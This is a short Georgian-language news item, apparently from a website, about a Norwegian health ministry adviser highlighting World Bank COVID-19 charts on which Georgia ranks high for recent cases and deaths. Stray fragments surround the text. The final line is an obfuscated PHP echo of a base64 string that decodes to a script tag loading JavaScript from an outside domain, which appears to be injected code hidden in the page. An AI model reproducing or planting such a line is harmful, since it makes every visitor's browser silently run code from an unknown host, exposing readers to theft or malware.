celsiusi
ავერსი შნაიდერი
ნორვეგიის სამეფოს ჯანდაცვის სამინისტროს უფროსი მრჩეველი, ზაზა წერეთელი სოციალურ ქსელში მსოფლიოში  კოვიდსტატისტიკის გრაფიკის ფოტოებს აზიარებს და მოცემულ გრაფიკში ინფიცირების და გარდაცვალების მაჩვენებლების მიხედვით საქართველოს სამწუხარო ლიდერობაზე ამახვილებს ყურადღებას.  
 
“როგორც გრაფიკებიდან ჩანს, კოვიდ სიკვდილიანობის მხრივ საქართველო პირველ ადგილზეა თავის რეგიონში, ხოლო, მსოფლიოს 50 ქვეყანას შორის შემთხვევათა რაოდენობაში  მეოთხე, ქვეყნებს შორის კი მესამე ადგილზეა.
მსოფლიო ბანკის ექსპერტების მიერ მომზადებული კვლევების 2 საინტერესო გრაფიკი, რომელიც გუშინ, 8 აგვისტოს გამოქვეყნდა.”- წერს ზაზა წერეთელი.
 
მისივე განმარტებით, პირველზე ფოტოზე მინიშნებულია ის 50 ქვეყანა და აშშ შტატი, რომელსაც ყველაზე მაღალი მაჩვენებელი აქვს 100 000 მოსახლეზე შემთხვევების რაოდენობით (ბოლო 7 დღის განმავლობაში) .
მეორეზე  კი მილიონ ადამიანზე გარდაცვლილთა რაოდენობა (ბოლო 7 დღის განმავლობაში).
 
ზაზა წერეთელი ჩვენი ქვეყნის კიდევ ერთ სამწუხარო ლიდერობაზე ამახვილებს ყურადღებას სადაც რეგიონში  ბოლო ორ კვირაში 100 000  ადამიანზე კოვიდ შემთხვევების რაოდენობაა მოცემული. 
 
“როგორც გრაფიკიდან ჩანს საქართველო ძალიან წინ არის გაჭრილი ამ რბოლაში და "სამწუხაროდ საპატიო" პირველ ადგილზეა ჯანმოს ევროპულ რეგიონში.”- წერს წერეთელი. 
 
 
1261
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");